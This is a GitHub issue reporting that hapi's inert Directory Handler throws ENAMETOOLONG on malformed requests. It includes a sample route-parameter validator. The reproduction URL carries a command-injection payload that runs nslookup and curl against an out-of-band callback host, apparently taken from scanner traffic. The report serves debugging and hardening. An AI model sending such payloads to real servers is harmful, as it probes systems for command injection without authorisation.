
Error: Failed to open file: ENAMETOOLONG

Open elawad opened this issue 1 year ago • 1 comments

Support plan

  • is this issue currently blocking your project? (yes/no): no
  • is this issue affecting a production system? (yes/no): yes

Context

  • node version: 20.12.0
  • module version with issue: 7.1.0
  • last module version without issue: n/a
  • environment (e.g. node, browser, native): node
  • used with (e.g. hapi application, another framework, standalone, ...): hapi
  • any other relevant information: n/a

What are you trying to achieve or the steps to reproduce?

Using the Directory Handler feature, we noticed server errors from possible traversal attacks on a static public folder. https://hapi.dev/tutorials/servingfiles/?lang=en_US#directoryhandler

To fix the issue, we had to remove the directory handler in favor of the File Handler options, where custom logic was then added to check the request.params. https://hapi.dev/tutorials/servingfiles/?lang=en_US#fileoptions

But I was wondering if this error can be gracefully handled by Inert while using the Directory Handler.

const Hapi = require('@hapi/hapi');
const Inert = require('@hapi/inert');

const server = Hapi.server({
  port: 3000,
  debug: { request: '*' },
});

(async () => {
  await server.register([Inert]);

  server.route({
    method: 'GET',
    path: '/{filename*}',
    handler: {
      directory: { path: 'public' },
    },
  });

  await server.start();
})();

Make a GET request to: http://localhost:3000/{{;(nslookup%20-q=cname%20hitkeomrgybdx4a46a.bxss.me||curl%20hitkeomrgybdx4a46a.bxss.me)|(nslookup%20-q=cname%20hitkeomrgybdx4a46a.bxss.me||curl%20hitkeomrgybdx4a46a.bxss.me)&(nslookup%20-q=cname%20hitkeomrgybdx4a46a.bxss.me||curl%20hitkeomrgybdx4a46a.bxss.me)}}swagger-ui-bundle.js

What was the result you got?

Error: Failed to open file: ENAMETOOLONG: name too long

What result did you expect?

Possibly a 404, similar to how other invalid paths are handled.

elawad, Mar 22 '23 23:03

Issue still occurs using node@20 and @hapi/[email protected]. Update description to reflect changes.

elawad, May 24 '24 18:05
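A sketch of the kind of `request.params` check the report describes as its workaround, as an added example that is not code from the issue or from inert. It assumes the error comes from a path component longer than the filesystem's name limit; `checkFilenameParam`, the reason strings and the 255/4096-byte limits (typical Linux values) are hypothetical names and assumptions.

```javascript
// Added example: hypothetical pre-check for the `filename` route param.
// Limits are assumptions (typical Linux values); adjust for the target filesystem.
const NAME_MAX_BYTES = 255;  // max bytes in a single path component
const PATH_MAX_BYTES = 4096; // max bytes in a full path, terminator included

function checkFilenameParam(param, baseDir = 'public') {
  if (typeof param !== 'string' || param.length === 0) {
    return { ok: false, reason: 'empty' };
  }
  // A NUL byte can never be part of a valid file name.
  if (param.includes('\0')) {
    return { ok: false, reason: 'nul-byte' };
  }
  // Limits are counted in bytes, not characters, so measure the UTF-8 encoding.
  const total =
    Buffer.byteLength(baseDir, 'utf8') + 1 + Buffer.byteLength(param, 'utf8');
  if (total >= PATH_MAX_BYTES) {
    return { ok: false, reason: 'path-too-long' };
  }
  for (const segment of param.split('/')) {
    if (segment === '..') {
      return { ok: false, reason: 'dot-dot' };
    }
    // An over-long component is what makes open() fail with ENAMETOOLONG.
    if (Buffer.byteLength(segment, 'utf8') > NAME_MAX_BYTES) {
      return { ok: false, reason: 'segment-too-long' };
    }
  }
  return { ok: true, reason: null };
}

// Constructed sample inputs (not taken from the report).
function demo() {
  const samples = [
    'js/swagger-ui-bundle.js',                  // ordinary asset path
    'a'.repeat(244) + 'swagger-ui-bundle.js',   // one 264-byte component
    'é'.repeat(128),                            // 128 characters, 256 bytes
    '../secret.txt',                            // parent-directory segment
  ];
  return samples.map((s) => checkFilenameParam(s).reason);
}

// Sketch of use in a route handler (not run here; h.file comes from inert):
//   handler: (request, h) => {
//     const { ok } = checkFilenameParam(request.params.filename);
//     return ok ? h.file(request.params.filename) : h.response().code(404);
//   }
```

Rejected inputs map to a 404 before any filesystem call is made, which matches the result the report expected.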